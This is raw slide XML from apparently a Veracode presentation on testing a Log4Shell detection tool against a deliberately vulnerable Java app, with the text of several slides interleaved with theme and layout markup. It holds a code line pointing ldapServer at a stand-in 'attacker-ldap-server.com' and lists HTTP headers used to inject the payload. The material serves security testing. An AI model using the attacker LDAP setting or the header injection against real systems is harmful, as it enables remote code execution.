                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Usage is very simple, j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>t a simple, single command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>But wait, I would need to do that for every application and domain idividually?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>There is a variable that have to be set correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ldapServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 'attacker-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRP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It is using headers to send the payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Api-Version, X-Forwarded-For, X-Client-IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Cookie, Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Assuming they are logged with Log4J in the background</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2417828300"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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28B720D-5910-436E-2C4C-22B720008EBE}"/>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495BAF2C-E200-FF18-69B5-75F08F501BD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4AA9505-F967-78BE-CE5D-B8F5E9A147C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Testing/Running it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EC6A29C-FC60-BE38-8473-0B356FB81C36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="1054962"/>
            <a:ext cx="5867400" cy="5245100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB17331-836D-F1EF-F1AD-C697979F4228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6755821" y="1051049"/>
            <a:ext cx="4807183" cy="4688463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Simply running it didn’t give me any any results</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I need an application that I know is vulnerable so I can test it with.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ChatGPT also gave me that information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>The demo app is starting a vulnerable Java Spring Boot application</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Start the app with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>java -jar log4shell-vulnerable-app-all.jar</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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And you will get a live running application on your local system that should be vulnerable to the Log4J Log4Shell vulnearbility</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I’m just to lacy to also build that on my own, and I’m still not a developer and have no idea about Java coding</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED966182-5F45-A6C9-90D7-49649A371AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163613" y="1612371"/>
            <a:ext cx="3314700" cy="5080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1936444748"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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5E1435C-A82A-9D41-562D-13013036BE09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DAC6E78-9CDD-37F2-FE88-B5DB10738182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C2B8DA-7F53-A65D-5944-01FF04AD43AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Testing/Running it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1226CF55-5744-10D5-209B-32FE45395664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368509" y="1067839"/>
            <a:ext cx="4292941" cy="4086052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767A16D9-7CD0-08FC-F606-EE5F41208553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="1207780"/>
            <a:ext cx="6483927" cy="3806170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Remember?</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Log4Sehll is sending LDAP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>I need an LDPA server to validate the request is really sent</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Asking ChatGPT proposed to use a tiny python tool, but that requires a full LDAP server running. I’m way to lazy to setup a local LDPA server j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>t to validate the request.</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Why don’t we j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>t use Wireshark to display the requests? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>LDAP is running on port 389</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>LDAP requests also require BASE64 encoded payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1206435109"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:wipe dir="r"/>
  </p:transition>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="7_Light Mode">
  <a:themeElements>
    <a:clrScheme name="Custom 2">
      <a:dk1>
        <a:srgbClr val="242626"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="F3F3F3"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="003A4C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00B3E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E2E369"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="A34840"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F26B5E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="93D2BD"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8C8986"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="000000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B3E6"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="003A4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txDef>
      <a:spPr/>
      <a:bodyPr wrap="square" numCol="1">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="400"/>
          </a:spcAft>
          <a:defRPr sz="1600" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Veracode-Template-2024" id="{756603BA-C91A-154F-A542-C3C233AB3DEF}" vid="{543B4460-100D-CC44-A70F-7055BE9088FF}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Light Mode">
  <a:themeElements>
    <a:clrScheme name="Custom 2">
      <a:dk1>
        <a:srgbClr val="242626"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="F3F3F3"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="003A4C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00B3E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E2E369"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="A34840"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F26B5E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="93D2BD"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8C8986"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="000000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B3E6"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="003A4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solidFill>
            <a:schemeClr val="accent5"/>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marL="342900" indent="-342900" algn="l">
          <a:spcAft>
            <a:spcPts val="1200"/>
          </a:spcAft>
          <a:buClr>
            <a:schemeClr val="bg2"/>
          </a:buClr>
          <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          <a:buChar char="•"/>
          <a:defRPr sz="1600" dirty="0" err="1" smtClean="0"/>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="2_Use_Veracode_Powerpoint_TemplateDeck_FY23.pptx" id="{23C06943-B416-43EB-8836-75803030E4B3}" vid="{FBC75511-ECA4-4BFD-B501-1F1C73842AA0}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Light Mode">
  <a:themeElements>
    <a:clrScheme name="Custom 2">
      <a:dk1>
        <a:srgbClr val="242626"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="F3F3F3"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="003A4C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00B3E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E2E369"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="A34840"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F26B5E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="93D2BD"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8C8986"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="000000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B3E6"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="003A4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effectLst>
          <a:outerShdw blurRad="76200" dist="12700" dir="2700000" algn="tl" rotWithShape="0">
            <a:prstClr val="black">
              <a:alpha val="18000"/>
            </a:prstClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr dirty="0">
            <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>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marR="0" algn="l" fontAlgn="base">
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buSzPts val="1000"/>
          <a:tabLst>
            <a:tab pos="914400" algn="l"/>
          </a:tabLst>
          <a:defRPr sz="1800" dirty="0" smtClean="0">
            <a:effectLst/>
            <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            <a:ea typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
